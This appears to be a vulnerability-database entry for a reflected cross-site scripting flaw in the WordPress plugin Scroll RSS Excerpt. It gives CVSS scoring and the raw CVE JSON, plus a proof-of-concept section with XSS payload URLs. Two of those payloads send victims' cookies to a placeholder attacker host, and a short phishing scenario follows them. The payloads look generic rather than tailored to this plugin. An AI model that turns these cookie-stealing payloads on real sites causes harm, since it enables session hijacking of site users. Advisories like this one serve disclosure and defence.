Security Vulnerability Report
CVE-2025-68892 CVSS 7.1 HIGH

Published: 2026-01-08 10:15:54
Last Modified: 2026-04-27 19:16:37

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in [email protected] Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS. This issue affects Scroll rss excerpt: from n/a through <= 5.0.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Scroll RSS Excerpt <= 5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
<!-- CVE-2025-68892 Reflected XSS PoC for WordPress Scroll RSS Excerpt Plugin -->
<!-- Attack URL: Inject JavaScript via URL parameter -->

<!-- Basic XSS PoC -->
http://target-site.com/?s=<script>alert(document.domain)</script>

<!-- Cookie Stealing PoC -->
http://target-site.com/?s=<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Session Hijacking PoC -->
http://target-site.com/?s=<script>document.location='https://attacker.com/log?cookie='+document.cookie</script>

<!-- DOM-based XSS PoC -->
http://target-site.com/?s=<svg/onload=alert(document.cookie)>

<!-- Real-world attack scenario -->
<!--
1. Attacker crafts malicious URL with XSS payload
2. Attacker sends phishing email with the malicious link
3. Victim clicks the link
4. Malicious JavaScript executes in victim's browser
5. Attacker steals session cookies or performs actions as victim
-->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68892", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:54.483", "lastModified": "2026-04-27T19:16:37.437", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in [email protected] Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS.This issue affects Scroll rss excerpt: from n/a through <= 5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/scroll-rss-excerpt/vulnerability/wordpress-scroll-rss-excerpt-plugin-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}